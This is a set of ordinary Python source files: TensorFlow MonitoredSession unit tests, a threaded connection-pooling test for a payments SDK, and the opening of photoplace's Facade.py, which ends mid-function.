recoverable_sess = monitored_session._RecoverableSession(
self._SessionReturner(sess))
self.assertEqual(51, recoverable_sess.run(v, feed_dict={c: 51}))
def test_recovery(self):
with self.test_session() as sess:
class StackSessionCreator(object):
def __init__(self, sess):
self.sessions_to_use = [
AbortAtNSession(sess, x + 1) for x in range(3)
]
def create_session(self):
return self.sessions_to_use.pop(0)
c = tf.constant(0)
v = tf.identity(c)
session_creator = StackSessionCreator(sess)
# List of 3 sessions to use for recovery. The first one aborts
# after 1 run() call, the second after 2 run calls, the third
# after 3 run calls.
self.assertEqual(3, len(session_creator.sessions_to_use))
      # Make the recoverable session use these 3 sessions in sequence by
      # passing a factory that pops from the sessions_to_use list.
recoverable_sess = monitored_session._RecoverableSession(session_creator)
self.assertEqual(
2, len(session_creator.sessions_to_use)) # One session popped.
# Using first session.
self.assertEqual(51, recoverable_sess.run(v, feed_dict={c: 51}))
self.assertEqual(
2, len(session_creator.sessions_to_use)) # Still 2 sessions available
# This will fail and recover by picking up the second session.
self.assertEqual(42, recoverable_sess.run(v, feed_dict={c: 42}))
self.assertEqual(
1, len(session_creator.sessions_to_use)) # Still 1 session available
self.assertEqual(33, recoverable_sess.run(v, feed_dict={c: 33}))
self.assertEqual(
1, len(session_creator.sessions_to_use)) # Still 1 session available
# This will fail and recover by picking up the last session.
self.assertEqual(24, recoverable_sess.run(v, feed_dict={c: 24}))
self.assertEqual(
0, len(session_creator.sessions_to_use)) # All sessions used.
self.assertEqual(11, recoverable_sess.run(v, feed_dict={c: 11}))
self.assertEqual(0, recoverable_sess.run(v, feed_dict={c: 0}))
# This will fail and throw a real error as the pop() will fail.
with self.assertRaisesRegexp(IndexError, 'pop from empty list'):
recoverable_sess.run(v, feed_dict={c: -12})
class FakeSession(monitored_session._WrappedSession):
def __init__(self, sess):
monitored_session._WrappedSession.__init__(self, sess)
self.args_called = {}
def run(self, fetches, **kwargs):
self.args_called = dict(kwargs)
# Call run only with fetches since we directly pass other arguments.
return monitored_session._WrappedSession.run(self, fetches)
class HookedSessionTest(tf.test.TestCase):
def testRunPassesAllArguments(self):
with tf.Graph().as_default(), tf.Session() as sess:
mock_run = FakeSession(sess)
mon_sess = monitored_session._HookedSession(sess=mock_run, hooks=[])
a_tensor = tf.constant([0], name='a_tensor')
sess.run(tf.global_variables_initializer())
output = mon_sess.run(fetches=a_tensor,
feed_dict='a_feed',
options='an_option',
run_metadata='a_metadata')
self.assertEqual(output, [0])
self.assertEqual(mock_run.args_called, {
'feed_dict': 'a_feed',
'options': 'an_option',
'run_metadata': 'a_metadata'
})
def testCallsHooksBeginEnd(self):
with tf.Graph().as_default(), tf.Session() as sess:
mock_hook = FakeHook()
mock_hook2 = FakeHook()
mon_sess = monitored_session._HookedSession(
sess=sess, hooks=[mock_hook, mock_hook2])
a_tensor = tf.constant([0], name='a_tensor')
sess.run(tf.global_variables_initializer())
mon_sess.run(a_tensor)
for hook in [mock_hook, mock_hook2]:
self.assertEqual(
hook.last_run_values,
tf.train.SessionRunValues(
results=None,
options=config_pb2.RunOptions(),
run_metadata=config_pb2.RunMetadata()))
self.assertEqual(hook.last_run_context.original_args,
tf.train.SessionRunArgs(a_tensor))
self.assertEqual(hook.last_run_context.session, sess)
self.assertEqual(hook.call_counter['before_run'], 1)
self.assertEqual(hook.call_counter['after_run'], 1)
def testShouldStop(self):
with tf.Graph().as_default(), tf.Session() as sess:
mock_hook = FakeHook()
mock_hook2 = FakeHook()
mon_sess = monitored_session._HookedSession(
sess=sess, hooks=[mock_hook, mock_hook2])
tf.constant([0], name='a_tensor')
sess.run(tf.global_variables_initializer())
mon_sess.run(fetches='a_tensor')
self.assertFalse(mon_sess.should_stop())
mock_hook.should_stop = True
mon_sess.run(fetches='a_tensor')
self.assertTrue(mon_sess.should_stop())
def testFetchesHookRequests(self):
with tf.Graph().as_default(), tf.Session() as sess:
mock_hook = FakeHook()
mock_hook2 = FakeHook()
mon_sess = monitored_session._HookedSession(
sess=sess, hooks=[mock_hook, mock_hook2])
a_tensor = tf.constant([0], name='a_tensor')
another_tensor = tf.constant([5], name='another_tensor')
third_tensor = tf.constant([10], name='third_tensor')
mock_hook.request = tf.train.SessionRunArgs([another_tensor])
mock_hook2.request = tf.train.SessionRunArgs([third_tensor])
sess.run(tf.global_variables_initializer())
output = mon_sess.run(fetches=a_tensor)
self.assertEqual(output, [0])
self.assertEqual(mock_hook.last_run_values.results, [5])
self.assertEqual(mock_hook2.last_run_values.results, [10])
def testOnlyHooksHaveFeeds(self):
with tf.Graph().as_default(), tf.Session() as sess:
mock_hook = FakeHook()
mock_hook2 = FakeHook()
mon_sess = monitored_session._HookedSession(
sess=sess, hooks=[mock_hook, mock_hook2])
a_tensor = tf.constant([0], name='a_tensor')
b_tensor = tf.constant([0], name='b_tensor')
add_tensor = a_tensor + b_tensor
mock_hook.request = tf.train.SessionRunArgs(
None, feed_dict={
a_tensor: [5]
})
mock_hook2.request = tf.train.SessionRunArgs(
None, feed_dict={
b_tensor: [10]
})
sess.run(tf.global_variables_initializer())
self.assertEqual(mon_sess.run(fetches=add_tensor), [15])
def testBothHooksAndUserHaveFeeds(self):
with tf.Graph().as_default(), tf.Session() as sess:
mock_hook = FakeHook()
mock_hook2 = FakeHook()
mon_sess = monitored_session._HookedSession(
sess=sess, hooks=[mock_hook, mock_hook2])
a_tensor = tf.constant([0], name='a_tensor')
b_tensor = tf.constant([0], name='b_tensor')
c_tensor = tf.constant([0], name='c_tensor')
add_tensor = a_tensor + b_tensor + c_tensor
mock_hook.request = tf.train.SessionRunArgs(
None, feed_dict={
a_tensor: [5]
})
mock_hook2.request = tf.train.SessionRunArgs(
None, feed_dict={
b_tensor: [10]
})
sess.run(tf.global_variables_initializer())
feed_dict = {c_tensor: [20]}
self.assertEqual(
mon_sess.run(fetches=add_tensor, feed_dict=feed_dict), [35])
# User feed_dict should not be changed
self.assertEqual(len(feed_dict), 1)
def testHooksFeedConflicts(self):
with tf.Graph().as_default(), tf.Session() as sess:
mock_hook = FakeHook()
mock_hook2 = FakeHook()
mon_sess = monitored_session._HookedSession(
sess=sess, hooks=[mock_hook, mock_hook2])
a_tensor = tf.constant([0], name='a_tensor')
b_tensor = tf.constant([0], name='b_tensor')
add_tensor = a_tensor + b_tensor
mock_hook.request = tf.train.SessionRunArgs(
None, feed_dict={
a_tensor: [5]
})
mock_hook2.request = tf.train.SessionRunArgs(
None, feed_dict={
a_tensor: [10]
})
sess.run(tf.global_variables_initializer())
with self.assertRaisesRegexp(RuntimeError, 'Same tensor is fed'):
mon_sess.run(fetches=add_tensor)
def testHooksAndUserFeedConflicts(self):
with tf.Graph().as_default(), tf.Session() as sess:
mock_hook = FakeHook()
mock_hook2 = FakeHook()
mon_sess = monitored_session._HookedSession(
sess=sess, hooks=[mock_hook, mock_hook2])
a_tensor = tf.constant([0], name='a_tensor')
b_tensor = tf.constant([0], name='b_tensor')
add_tensor = a_tensor + b_tensor
mock_hook.request = tf.train.SessionRunArgs(
None, feed_dict={
a_tensor: [5]
})
mock_hook2.request = tf.train.SessionRunArgs(
None, feed_dict={
b_tensor: [10]
})
sess.run(tf.global_variables_initializer())
with self.assertRaisesRegexp(RuntimeError, 'Same tensor is fed'):
mon_sess.run(fetches=add_tensor, feed_dict={b_tensor: [10]})
class RaiseOnceAtCountN(tf.train.SessionRunHook):
"""Hook that raises an Exception at step N."""
def __init__(self, n, ex):
self.n = n
self.ex = ex
self.raised = False
def before_run(self, run_context):
# Raise the first time we reach step N.
self.n -= 1
if 0 == self.n and not self.raised:
self.raised = True
raise self.ex
return None
class RunOptionsMetadataHook(tf.train.SessionRunHook):
"""A hook that observes & optionally modifies RunOptions and RunMetadata."""
def __init__(self, trace_level, timeout_in_ms, output_partition_graphs,
debug_tensor_watch):
self._trace_level = trace_level
self._timeout_in_ms = timeout_in_ms
self._output_partition_graphs = output_partition_graphs
self._debug_tensor_watch = debug_tensor_watch
self.run_options_list = []
self.run_metadata_list = []
def before_run(self, run_context):
options = config_pb2.RunOptions(
trace_level=self._trace_level,
timeout_in_ms=self._timeout_in_ms,
output_partition_graphs=self._output_partition_graphs)
options.debug_tensor_watch_opts.extend([self._debug_tensor_watch])
return tf.train.SessionRunArgs(None, None, options=options)
def after_run(self, run_context, run_values):
self.run_options_list.append(run_values.options)
self.run_metadata_list.append(run_values.run_metadata)
class MonitoredSessionTest(tf.test.TestCase):
"""MonitoredSession tests."""
def test_defaults(self):
with tf.Graph().as_default():
a_var = tf.Variable(0)
with tf.train.MonitoredSession() as session:
self.assertEqual(0, session.run(a_var))
def test_last_step(self):
logdir = _test_dir(self.get_temp_dir(), 'test_last_step')
with tf.Graph().as_default():
gstep = tf.contrib.framework.get_or_create_global_step()
do_step = tf.assign_add(gstep, 1)
# Run till step 3 and save.
hooks = [tf.train.StopAtStepHook(last_step=3)]
scaffold = tf.train.Scaffold().finalize()
with tf.train.MonitoredSession(hooks=hooks) as session:
self.assertEqual(0, session.run(gstep))
self.assertFalse(session.should_stop())
self.assertEqual(1, session.run(do_step))
self.assertFalse(session.should_stop())
self.assertEqual(2, session.run(do_step))
self.assertFalse(session.should_stop())
self.assertEqual(3, session.run(do_step))
self.assertTrue(session.should_stop())
save_path = scaffold.saver.save(session._coordinated_creator.tf_sess,
os.path.join(logdir, 'step-3'))
# Run till step 5 and save.
def load_ckpt(scaffold, sess):
scaffold.saver.restore(sess, save_path)
session_creator = tf.train.ChiefSessionCreator(
tf.train.Scaffold(init_fn=load_ckpt))
hooks = [tf.train.StopAtStepHook(last_step=5)]
with tf.train.MonitoredSession(
hooks=hooks, session_creator=session_creator) as session:
self.assertEqual(3, session.run(gstep))
self.assertFalse(session.should_stop())
self.assertEqual(4, session.run(do_step))
self.assertFalse(session.should_stop())
self.assertEqual(5, session.run(do_step))
self.assertTrue(session.should_stop())
def test_num_steps(self):
logdir = _test_dir(self.get_temp_dir(), 'test_num_steps')
with tf.Graph().as_default():
gstep = tf.contrib.framework.get_or_create_global_step()
do_step = tf.assign_add(gstep, 1)
# Do 3 steps and save.
hooks = [tf.train.StopAtStepHook(num_steps=3)]
scaffold = tf.train.Scaffold().finalize()
with tf.train.MonitoredSession(hooks=hooks) as session:
session.run(do_step)
self.assertFalse(session.should_stop())
session.run(do_step)
self.assertFalse(session.should_stop())
session.run(do_step)
self.assertTrue(session.should_stop())
save_path = scaffold.saver.save(session._coordinated_creator.tf_sess,
os.path.join(logdir, 'step-3'))
# Restore and do 4 steps.
def load_ckpt(scaffold, sess):
scaffold.saver.restore(sess, save_path)
session_creator = tf.train.ChiefSessionCreator(
scaffold=tf.train.Scaffold(init_fn=load_ckpt))
hooks = [tf.train.StopAtStepHook(num_steps=4)]
with tf.train.MonitoredSession(
hooks=hooks, session_creator=session_creator) as session:
self.assertEqual(4, session.run(do_step))
self.assertFalse(session.should_stop())
session.run(do_step)
self.assertFalse(session.should_stop())
session.run(do_step)
self.assertFalse(session.should_stop())
session.run(do_step)
self.assertTrue(session.should_stop())
  # This set of tests verifies the monitored session behavior when exceptions
  # are raised next to the innermost session run() call.
def test_recovery(self):
logdir = _test_dir(self.get_temp_dir(), 'test_recovery')
with tf.Graph().as_default():
gstep = tf.contrib.framework.get_or_create_global_step()
do_step = tf.assign_add(gstep, 1)
scaffold = tf.train.Scaffold()
# Use a hook to save the model every 100 steps. It also saves it at
# the end.
hooks = [tf.train.CheckpointSaverHook(
logdir, save_steps=1, scaffold=scaffold)]
with tf.train.MonitoredSession(
session_creator=tf.train.ChiefSessionCreator(
scaffold, checkpoint_dir=logdir),
hooks=hooks) as session:
self.assertEqual(0, session.run(gstep))
self.assertEqual(1, session.run(do_step))
self.assertEqual(2, session.run(do_step))
# A restart will find the checkpoint and recover automatically.
with tf.train.MonitoredSession(
session_creator=tf.train.ChiefSessionCreator(
scaffold, checkpoint_dir=logdir)) as session:
self.assertEqual(2, session.run(gstep))
def test_retry_on_aborted_error(self):
# Tests that we silently retry on abort. Note that this does not test
# recovery as we do not use a CheckpointSaver in this test.
with tf.Graph().as_default():
gstep = tf.contrib.framework.get_or_create_global_step()
do_step = tf.assign_add(gstep, 1)
hook = RaiseOnceAtCountN(4, tf.errors.AbortedError(None, None, 'Abort'))
with tf.train.MonitoredSession(hooks=[hook]) as session:
self.assertEqual(0, session.run(gstep))
self.assertEqual(1, session.run(do_step))
self.assertEqual(2, session.run(do_step))
self.assertFalse(session.should_stop())
# Here at step 3, the hook triggers and raises AbortedError. The
        # MonitoredSession automatically retries and restarts from a freshly
# initialized session, so the step is back to 0 and running do_step
# moves it to 1.
self.assertEqual(1, session.run(do_step))
self.assertFalse(session.should_stop())
self.assertTrue(hook.raised)
self.assertEqual(2, session.run(do_step))
self.assertFalse(session.should_stop())
def test_recover_and_retry_on_aborted_error(self):
# Tests that we silently retry and recover on abort. This test uses
# a CheckpointSaver to have something to recover from.
logdir = _test_dir(self.get_temp_dir(),
'test_recover_and_retry_on_aborted_error')
with tf.Graph().as_default():
gstep = tf.contrib.framework.get_or_create_global_step()
do_step = tf.assign_add(gstep, 1)
scaffold = tf.train.Scaffold()
abort_hook = RaiseOnceAtCountN(
4, tf.errors.AbortedError(None, None, 'Abort'))
# Save after each step.
ckpt_hook = tf.train.CheckpointSaverHook(
logdir, save_steps=1, scaffold=scaffold)
hooks = [abort_hook, ckpt_hook]
with tf.train.MonitoredSession(
session_creator=tf.train.ChiefSessionCreator(
scaffold, checkpoint_dir=logdir),
hooks=hooks) as session:
self.assertEqual(0, session.run(gstep))
self.assertEqual(1, session.run(do_step))
self.assertEqual(2, session.run(do_step))
self.assertFalse(session.should_stop())
# Here at step 3, the hook triggers and raises AbortedError. The
# MonitoredSession automatically restores and retries.
self.assertEqual(3, session.run(do_step))
self.assertTrue(abort_hook.raised)
self.assertFalse(session.should_stop())
self.assertEqual(4, session.run(do_step))
self.assertFalse(session.should_stop())
def test_exit_cleanly_on_out_of_range_exception(self):
# Tests that we stop cleanly when OutOfRange is raised.
with tf.Graph().as_default():
gstep = tf.contrib.framework.get_or_create_global_step()
do_step = tf.assign_add(gstep, 1)
hook = RaiseOnceAtCountN(2, tf.errors.OutOfRangeError(None, None, 'EOI'))
session = tf.train.MonitoredSession(hooks=[hook])
# session should cleanly exit from the context.
with session:
self.assertEqual(0, session.run(gstep))
self.assertFalse(session.should_stop())
# Here at step 1, the hook triggers and raises OutOfRange. The
# session should go into should_stop() mode. It should raise the
# exception. So next step should not be executed.
session.run(do_step)
self.assertTrue(False)
self.assertTrue(session.should_stop())
def test_exit_cleanly_on_stop_iteration_exception(self):
    # Tests that we stop cleanly when StopIteration is raised.
with tf.Graph().as_default():
gstep = tf.contrib.framework.get_or_create_global_step()
do_step = tf.assign_add(gstep, 1)
hook = RaiseOnceAtCountN(2, StopIteration)
session = tf.train.MonitoredSession(hooks=[hook])
# session should cleanly exit from the context.
with session:
self.assertEqual(0, session.run(gstep))
self.assertFalse(session.should_stop())
# Here at step 1, the hook triggers and raises StopIteration. The
# session should go into should_stop() mode. It should raise the
# exception. So next step should not be executed.
session.run(do_step)
self.assertTrue(False)
self.assertTrue(session.should_stop())
def test_regular_exception_pass_through_run(self):
# Tests that regular exceptions just pass through a "with
# MonitoredSession" block and set the session in stop mode.
with tf.Graph().as_default():
gstep = tf.contrib.framework.get_or_create_global_step()
do_step = tf.assign_add(gstep, 1)
hook = RaiseOnceAtCountN(4, RuntimeError('regular exception'))
session = tf.train.MonitoredSession(hooks=[hook])
with self.assertRaisesRegexp(RuntimeError, 'regular exception'):
with session:
self.assertEqual(0, session.run(gstep))
self.assertEqual(1, session.run(do_step))
self.assertEqual(2, session.run(do_step))
self.assertFalse(session.should_stop())
# This triggers the hook and raises the exception
session.run(do_step)
# We should not hit this
self.assertFalse(True)
self.assertTrue(hook.raised)
self.assertTrue(session.should_stop())
def test_regular_exception_reported_to_coord_pass_through_run(self):
# Tests that regular exceptions reported to the coordinator from a thread
# passes through a "run()" call within a "with MonitoredSession" block and
# set the session in stop mode.
with tf.Graph().as_default():
gstep = tf.contrib.framework.get_or_create_global_step()
session = tf.train.MonitoredSession()
run_performed_without_error = False
with self.assertRaisesRegexp(RuntimeError, 'a thread wants to stop'):
with session:
self.assertEqual(0, session.run(gstep))
# Report an exception through the coordinator.
try:
raise RuntimeError('a thread wants to stop')
except RuntimeError as e:
session._coordinated_creator.coord.request_stop(e)
# Call run() which should perform normally.
self.assertEqual(0, session.run(gstep))
run_performed_without_error = True
self.assertTrue(run_performed_without_error)
def test_regular_exception_reported_to_coord_pass_through_return(self):
# Tests that regular exceptions reported to the coordinator from a thread
    # pass through returning from a "with MonitoredSession" block and
# set the session in stop mode.
with tf.Graph().as_default():
gstep = tf.contrib.framework.get_or_create_global_step()
session = tf.train.MonitoredSession()
with self.assertRaisesRegexp(RuntimeError, 'a thread wants to stop'):
with session:
self.assertEqual(0, session.run(gstep))
# Report an exception through the coordinator.
try:
raise RuntimeError('a thread wants to stop')
except RuntimeError as e:
session._coordinated_creator.coord.request_stop(e)
self.assertTrue(session.should_stop())
  # This set of tests verifies the session behavior when exceptions are raised
  # from code inside a "with MonitoredSession:" context.
def test_stop_cleanly_when_no_exception_in_with_body(self):
    # Tests that the session stops cleanly when the with-body finishes without raising.
with tf.Graph().as_default():
gstep = tf.contrib.framework.get_or_create_global_step()
do_step = tf.assign_add(gstep, 1)
session = tf.train.MonitoredSession()
with session:
self.assertEqual(1, session.run(do_step))
self.assertEqual(2, session.run(do_step))
self.assertFalse(session.should_stop())
# Should have closed.
self.assertTrue(session.should_stop())
self.assertTrue(session._is_closed())
def test_raises_regular_exceptions_in_with_body(self):
# Tests that regular exceptions in "with body" are seen outside.
with tf.Graph().as_default():
gstep = tf.contrib.framework.get_or_create_global_step()
do_step = tf.assign_add(gstep, 1)
session = tf.train.MonitoredSession()
# We should see that exception.
with self.assertRaisesRegexp(RuntimeError, 'regular exception'):
with session:
self.assertEqual(1, session.run(do_step))
self.assertEqual(2, session.run(do_step))
self.assertFalse(session.should_stop())
# Will be visible outside the "with body".
raise RuntimeError('regular exception')
# Should have closed.
self.assertTrue(session.should_stop())
self.assertTrue(session._is_closed())
def test_graph(self):
g = tf.Graph()
with g.as_default():
session = tf.train.MonitoredSession()
self.assertEqual(g, session.graph)
def test_merge_run_options_from_hooks(self):
"""Test for rewriting RunOptions and observing RunMetadata with hooks."""
with tf.Graph().as_default():
my_const = tf.constant(42, name='my_const')
_ = tf.constant(24, name='my_const_2')
watch_a = config_pb2.DebugTensorWatch(
node_name='my_const',
output_slot=0,
debug_ops=['DebugIdentity'],
debug_urls=[])
hook_a = RunOptionsMetadataHook(2, 30000, False, watch_a)
watch_b = config_pb2.DebugTensorWatch(
node_name='my_const_2',
output_slot=0,
debug_ops=['DebugIdentity'],
debug_urls=[])
hook_b = RunOptionsMetadataHook(3, 60000, True, watch_b)
with tf.train.MonitoredSession(hooks=[hook_a, hook_b]) as session:
self.assertEqual(42, session.run(my_const))
# trace_level=3 should have overridden trace_level=2;
# timeout_in_ms=60000 should have overridden 30000;
# output_partition_graphs=True should have overridden False.
# The two debug tensor watches should have been merged.
self.assertEqual(
[
config_pb2.RunOptions(
trace_level=3,
timeout_in_ms=60000,
output_partition_graphs=True,
debug_tensor_watch_opts=[watch_a, watch_b])
],
hook_b.run_options_list)
self.assertEqual(1, len(hook_b.run_metadata_list))
self.assertTrue(
isinstance(hook_b.run_metadata_list[0], config_pb2.RunMetadata))
self.assertGreater(len(hook_b.run_metadata_list[0].partition_graphs), 0)
def test_merge_caller_and_hook_run_options(self):
"""Test that RunOptions from caller and hooks can be merged properly."""
with tf.Graph().as_default():
my_const = tf.constant(42, name='my_const')
_ = tf.constant(24, name='my_const_2')
hook_watch = config_pb2.DebugTensorWatch(
node_name='my_const_2',
output_slot=0,
debug_ops=['DebugIdentity'],
debug_urls=[])
hook = RunOptionsMetadataHook(2, 60000, False, hook_watch)
with tf.train.MonitoredSession(hooks=[hook]) as session:
caller_watch = config_pb2.DebugTensorWatch(
node_name='my_const',
output_slot=0,
debug_ops=['DebugIdentity'],
debug_urls=[])
caller_options = config_pb2.RunOptions(
trace_level=3, timeout_in_ms=30000, output_partition_graphs=True)
caller_options.debug_tensor_watch_opts.extend([caller_watch])
self.assertEqual(42, session.run(my_const, options=caller_options))
# trace_level=3 from the caller should override 2 from the hook.
# timeout_in_ms=60000 from the hook should override from the caller.
# output_partition_graph=True from the caller should override False
# from the hook.
# The two debug watches from the caller and the hook should be merged,
# in that order.
self.assertEqual(
[
config_pb2.RunOptions(
trace_level=3,
timeout_in_ms=60000,
output_partition_graphs=True,
debug_tensor_watch_opts=[caller_watch, hook_watch])
],
hook.run_options_list)
self.assertEqual(1, len(hook.run_metadata_list))
self.assertTrue(
isinstance(hook.run_metadata_list[0], config_pb2.RunMetadata))
self.assertGreater(len(hook.run_metadata_list[0].partition_graphs), 0)
if __name__ == '__main__':
tf.test.main()
|
test_connection_pooling.py
|
import threading
import timeit
import unittest
import tests.integration.init_utils as init_utils
from onlinepayments.sdk.factory import Factory
from tests.integration.init_utils import MERCHANT_ID
class ConnectionPoolingTest(unittest.TestCase):
"""Performs multiple threaded server requests with connection pooling in order to test thread-safety and concurrency
"""
def setUp(self):
self.flag = threading.Event() # flag to synchronise a start moment for the threads
self.result_list = [] # list to collect results from the threads
self.lock = threading.RLock() # mutex lock for the threads to provide concurrent access to the result list
def test_connection_pool_max_is_count(self):
"""Test with one pool per request"""
self.run_connection_pooling_test(10, 10)
def test_connection_pool_max_is_half(self):
"""Test with one pool per two requests"""
self.run_connection_pooling_test(10, 5)
def test_connection_pool_max_is_one(self):
"""Test with one pool for all 10 requests"""
self.run_connection_pooling_test(10, 1)
def run_connection_pooling_test(self, request_count, max_connections):
"""Sends *request_count* requests with a maximum number of connection pools equal to *max_connections*"""
communicator_configuration = init_utils.create_communicator_configuration(max_connections=max_connections)
with Factory.create_communicator_from_configuration(communicator_configuration) as communicator:
# Create a number of runner threads that will execute send_request
runner_threads = [
threading.Thread(target=self.send_request, args=(i, communicator)) for i in range(0, request_count)
]
for thread in runner_threads:
thread.start()
self.flag.set()
# wait until threads are done before closing the communicator
            for thread in runner_threads:
                thread.join()
print("Information on concurrent use of connections for {} connection pools:".format(max_connections))
print("(*start time*, *end time*)")
for item in self.result_list:
if isinstance(item, Exception):
self.fail("an exception occurred in one of the threads:/n" + str(item))
else:
print
repr(item)
# check server logs for information about concurrent use of connections
def send_request(self, i, communicator):
"""runs a (concurrent) request"""
try:
client = Factory.create_client_from_communicator(communicator)
self.flag.wait()
start_time = timeit.default_timer()
client.merchant(MERCHANT_ID).services().test_connection()
end_time = timeit.default_timer()
with self.lock:
self.result_list.append((start_time, end_time))
except Exception as e:
with self.lock:
self.result_list.append(e)
# check server logs for additional data about the requests sent
if __name__ == '__main__':
unittest.main()
|
Facade.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Facade.py
#
# Copyright 2010-2015 Jose Riguera Lopez <jriguera@gmail.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
__program__ = "photoplace"
__author__ = "Jose Riguera Lopez <jriguera@gmail.com>"
__version__ = "0.6.1"
__date__ = "Dec 2014"
__license__ = "Apache 2.0"
__copyright__ ="(c) Jose Riguera"
import os
import re
import threading
import locale
import ConfigParser
import logging
import logging.handlers
import loggingHandler
import time
import datetime
from observerHandler import DObserver
# #######################################
# Main class for Exceptions in Photoplace
# #######################################
class Error(Exception):
"""
Base class for exceptions
"""
def __init__(self, msg, tip='', type='Exception', title='Error'):
self.msg = msg
self.title = title
self.tip = tip
self.type = type
def __repr__(self):
return "%s (%s): %s (%s)" % \
(self.title, str(self.type), self.msg, self.tip)
def __str__(self):
return "* %s (%s):\n * %s\n-> %s" % \
(self.title, str(self.type), self.msg, self.tip)
# #######################################
# Parse string to datetime object
# #######################################
def parse_str_datetime(time_str):
"""Return (<scope>, <datetime.datetime() instance>) for the given
datetime string.
>>> _datetime_from_str("2009")
('year', datetime.datetime(2009, 1, 1, 0, 0))
>>> _datetime_from_str("2009-12")
('month', datetime.datetime(2009, 12, 1, 0, 0))
>>> _datetime_from_str("2009-12-25")
('day', datetime.datetime(2009, 12, 25, 0, 0))
>>> _datetime_from_str("2009-12-25 13")
('hour', datetime.datetime(2009, 12, 25, 13, 0))
>>> _datetime_from_str("2009-12-25 13:05")
('minute', datetime.datetime(2009, 12, 25, 13, 5))
>>> _datetime_from_str("2009-12-25 13:05:14")
('second', datetime.datetime(2009, 12, 25, 13, 5, 14))
>>> _datetime_from_str("2009-12-25 13:05:14.453728")
('microsecond', datetime.datetime(2009, 12, 25, 13, 5, 14, 453728))
"""
formats = [
# <scope>, <pattern>, <format>
("year", "YYYY", "%Y"),
("month", "YYYY-MM", "%Y-%m"),
("day", "YYYY-MM-DD", "%Y-%m-%d"),
("hour", "YYYY-MM-DD HH", "%Y-%m-%d %H"),
("minute", "YYYY-MM-DD HH:MM", "%Y-%m-%d %H:%M"),
("second", "YYYY-MM-DD HH:MM:SS", "%Y-%m-%d %H:%M:%S"),
# ".<microsecond>" at end is manually handled below
("microsecond", "YYYY-MM-DD HH:MM:SS", "%Y-%m-%d %H:%M:%S"),
]
for scope, pattern, format in formats:
if scope == "microsecond":
# Special handling for microsecond part. AFAIK there isn't a
# strftime code for this.
if time_str.count('.') != 1:
continue
time_str, microseconds_str = time_str.split('.')
try:
microsecond = int((microseconds_str + '000000')[:6])
except ValueError:
continue
try:
t = datetime.datetime.strptime(time_str, format)
except ValueError:
pass
else:
if scope == "microsecond":
t = t.replace(microsecond=microsecond)
return scope, t
else:
raise ValueError
import DataTypes
import Plugins
import Actions
import stateHandler
from definitions import *
# ##############################
# Dictionary Template Definition
# ##############################
class TemplateDict(dict):
"""
    Class for string templates backed by dict objects and the % operator.
    It inherits all attributes and methods from dict and redefines "__getitem__"
    so that a default value is returned when a key is not found. The format
    "key<separator>defaultvalue" means that if "key" is missing, "defaultvalue"
    is returned instead; it works like an OR: value or "defaultvalue".
    A global default value for all keys can also be defined.
"""
_SEPARATORKEYTEMPLATE_ = '|'
_DEFAULTVALUETEMPLATE_ = " "
def __getitem__(self, key):
try:
k, default = key.split(self._SEPARATORKEYTEMPLATE_, 1)
except ValueError:
k = key.split(self._SEPARATORKEYTEMPLATE_, 1)[0]
default = self._DEFAULTVALUETEMPLATE_
return self.get(k, default)
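# Illustrative usage, as a minimal sketch (the names "data", "author" and "title"
# below are made-up examples): a key missing from the dict falls back to the value
# written after the separator.
#
#   data = TemplateDict(author="Jose")
#   "%(author|unknown)s - %(title|untitled)s" % data   # -> 'Jose - untitled'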
# ################################
# PhotoPlace Facade Interface
# ################################
class Facade(object):
def __init__(self, resources, configfile, args, cfgopt, fargs):
object.__init__(self)
# Overwrite default values with command line args
self.argfiles = []
self.args = args
self.resourcedir = resources
self.configfile = configfile
self.options = dict(PhotoPlace_Cfg_default)
self.logfile = self.options['main'].setdefault('logfile')
self.loglevel = self.options['main'].setdefault('loglevel','')
self.finalize = False
self.state = None
self.observers = {}
self.addons = self.options["addons"]
# add the handler to the root logger
self.logger = logging.getLogger()
self.mainloghandler = loggingHandler.LogRedirectHandler()
self.mainloghandler.setLevel(logging.DEBUG)
consoleformatter = logging.Formatter(PhotoPlace_Cfg_consolelogformat)
self.mainloghandler.setFormatter(consoleformatter)
self.logger.addHandler(self.mainloghandler)
self.logger.setLevel(PhotoPlace_Cfg_loglevel)
self.pluginmanager = Plugins.pluginManager.PluginManager()
self.logger.debug("# " + PhotoPlace_name)
def load_config(self, defaults):
pass
def save_config(self, nosections=PhotoPlace_CONFIG_NOCLONE):
pass
def recover_config(self, directory=PhotoPlace_Cfg_altdir):
pass
def init(self, defaults=False):
if defaults:
self.options = PhotoPlace_Cfg_default
self.state = stateHandler.State(self.resourcedir, self.options['main'],)
def end(self):
self.Clear()
try:
self.unload_plugins()
except Exception as exception:
self.logger.error(str(exception))
def get_geophoto_attr(self, geophoto, options, key, default=None, estimated=None):
value = options[key]
try:
gvalue = geophoto.attr[key]
if isinstance(gvalue, str):
gvalue = gvalue.strip()
if gvalue == PhotoPlace_estimated:
value = estimated
elif gvalue == PhotoPlace_default:
value = default
else:
value = gvalue
else:
value = gvalue
except:
dgettext = dict()
dgettext['attr'] = key
msg_warning = _("Warning processing geophoto string attribute '%(attr)s': type not valid!")
self.logger.debug(msg_warning % dgettext)
return value
def get_geophoto_attr_bool(self, geophoto, options, key, default=None, estimated=None):
value = options[key]
try:
gvalue = geophoto.attr[key]
if isinstance(gvalue, bool):
value = gvalue
elif isinstance(gvalue, str):
gvalue = gvalue.strip()
if len(gvalue) < 1:
pass
elif gvalue == PhotoPlace_estimated:
value = estimated
elif gvalue == PhotoPlace_default:
value = default
else:
value = gvalue.lower() in ["yes", "true", "on", "si", "1"]
else:
raise TypeError
except:
dgettext = dict()
dgettext['attr'] = key
msg_warning = _("Warning processing geophoto bool attribute '%(attr)s': type not valid!")
self.logger.debug(msg_warning % dgettext)
return value
def get_geophoto_attr_number(self, geophoto, options, key, default=None, estimated=None):
value = options[key]
try:
gvalue = geophoto.attr[key]
if isinstance(gvalue, bool):
value = float(gvalue)
elif isinstance(gvalue, float):
value = gvalue
elif isinstance(gvalue, int):
value = float(gvalue)
elif isinstance(gvalue, str):
gvalue = gvalue.strip()
if gvalue == PhotoPlace_estimated:
value = estimated
